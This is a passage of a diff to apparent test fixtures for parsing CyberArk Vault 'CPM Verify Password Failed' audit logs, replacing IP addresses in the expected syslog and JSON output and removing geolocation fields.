\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814709\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserDN\" Value=\"ELASTIC.local\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Verify Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", 
@@ -208,11 +186,11 @@ "retries_count": "0", "reset_immediately": "VerifyTask", "last_task": "VerifyTask", - "cpm_error_details": "Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). ", + "cpm_error_details": "Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). ", "last_fail_date": "1615814709", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Verify Password Failed", 
@@ -225,9 +203,9 @@ }, "event": { "severity": 7, - "reason": "Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). ", - "ingested": "2021-06-09T10:24:34.493901800Z", - "original": "\u003c7\u003e1 2021-03-15T13:25:32Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:25:32\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:25:32Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;username=bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814709\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserDN\\\" Value=\\\"ELASTIC.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 34.66.114.180\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:25:32\",\"IsoTimestamp\":\"2021-03-15T13:25:32Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). 
\\n\",\"ExtraDetails\":\"address=34.66.114.180;username=bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814709\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"UserDN\",\"Value\":\"ELASTIC.local\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 34.66.114.180\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "reason": "Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). 
", + "ingested": "2021-12-09T13:37:01.193602100Z", + "original": "\u003c7\u003e1 2021-03-15T13:25:32Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:25:32\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:25:32Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814709\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserDN\\\" Value=\\\"ELASTIC.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:25:32\",\"IsoTimestamp\":\"2021-03-15T13:25:32Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). 
\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814709\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"UserDN\",\"Value\":\"ELASTIC.local\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", "action": "cpm verify password failed", @@ -250,22 +228,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", "user": { "name": "ELASTIC.local\\bart" }, - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -288,7 +255,7 @@ }, "@timestamp": "2021-03-15T13:33:26.000Z", "file": { - "path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart" }, "ecs": { "version": "1.12.0" 
@@ -300,27 +267,27 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n", "iso_timestamp": "2021-03-15T13:33:26Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:33:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:33:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n 
\u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615815206\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:33:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:33:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615815206\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Verify Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC.local\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", 
@@ -329,11 +296,11 @@ "retries_count": "0", "reset_immediately": "VerifyTask", "last_task": "VerifyTask", - "cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cpm_error_details": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", "last_fail_date": "1615815206", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Verify Password Failed", 
@@ -346,9 +313,9 @@ }, "event": { "severity": 7, - "reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-06-09T10:24:34.493904800Z", - "original": "\u003c7\u003e1 2021-03-15T13:33:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:33:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:33:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615815206\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 34.66.114.180\\\\ELASTIC.local\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
